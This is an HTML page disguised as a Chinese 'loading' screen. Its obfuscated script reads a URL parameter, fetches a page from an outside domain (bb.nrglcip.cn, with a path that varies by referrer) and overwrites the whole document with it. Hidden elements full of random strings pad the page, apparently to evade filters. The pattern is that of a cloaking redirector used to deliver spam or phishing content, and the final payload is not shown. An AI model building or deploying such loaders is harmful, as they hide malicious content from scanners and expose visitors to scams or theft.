<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .eXyhRDpn {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .eXyhRDpn .Y0onWfOfrTO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .eXyhRDpn .content {
            line-height: 50px;
            text-align: center
        }

        .eXyhRDpn .img {
            width: 100%
        }

        .eXyhRDpn .ueAqDRd {
            text-align: center
        }

        .eXyhRDpn .ueAqDRd span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .eXyhRDpn .ueAqDRd span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .eXyhRDpn .ueAqDRd span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .eXyhRDpn .ueAqDRd span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .eXyhRDpn .ueAqDRd span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .eXyhRDpn .ueAqDRd span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .eXyhRDpn .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function pEh62qcs3(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var USSQ0jc = pEh62qcs3('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ USSQ0jc +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ USSQ0jc +".html?a=share";
		}
		
        W49FHgmBC=url+"#"+new Date().getTime();
        W49FHgmBC && function() {
            $.get(W49FHgmBC, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >rJynhwqJGPEFhxEKesLk7SvbpfGunPmeAAAd7VA</ul>
<img  src='' style='display:none'>
<p  style='display:none'>S0jknw4yXHZAo7ayeXHuSkGBM98edEc1E3vMTPbtDSC8B7</p>
<b style='display:none' >H43RCLFgz0ufHQrnuJi5x</b>
<ul style='display:none' >rJynhwqJGPEFhxEKesLk7SvbpfGunPmeAAAd7VA</ul>
<span style='display:none'>WADsz7d35uXVHbGSCltdRtxWD3ZmYUcbFiwpbwyjF8fcgIyNptnAH3bLlKotuG6NV7jUHkgLK520GyvnjWuTWJ3v</span>
<b style='display:none' >H43RCLFgz0ufHQrnuJi5x</b><div class="eXyhRDpn">
    <div class="Y0onWfOfrTO">
        <div class="ueAqDRd">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>Zp5rQImi56PGT59QGiFknm0xNDeqh</span>
<a  href='#' style='display:none'>kZC4sM1VDMYcrPTdEQK9tNKWXFg79jeeyxk5I9MMJ3hKf25QXTdqDbvhNpOve6tUDbmw0H7BhZfECIS7nvOQGhe4FSb3niKvXw5</a>
<div style='display:none'>cXGuzvcB6AE8dlR1HKSUFizULeHyCGtLxUQF7Fat1SaggP4ZTTw73wAlbFgF5Y3edADLVuWaOEODhwA0</div>
<a  href='#' style='display:none'>kZC4sM1VDMYcrPTdEQK9tNKWXFg79jeeyxk5I9MMJ3hKf25QXTdqDbvhNpOve6tUDbmw0H7BhZfECIS7nvOQGhe4FSb3niKvXw5</a>
<ul style='display:none' >nRZUNuyeSXXkiJhGjR</ul>
<b style='display:none' >Gcs9C0q2KJMrWN</b>
<img  src='' style='display:none'>
<h1 style='display:none' >UrYAdDs7K1iF38iwGp92bRV4asS</h1>
<img  src='' style='display:none'>
<img  src='' style='display:none'></body>
</html>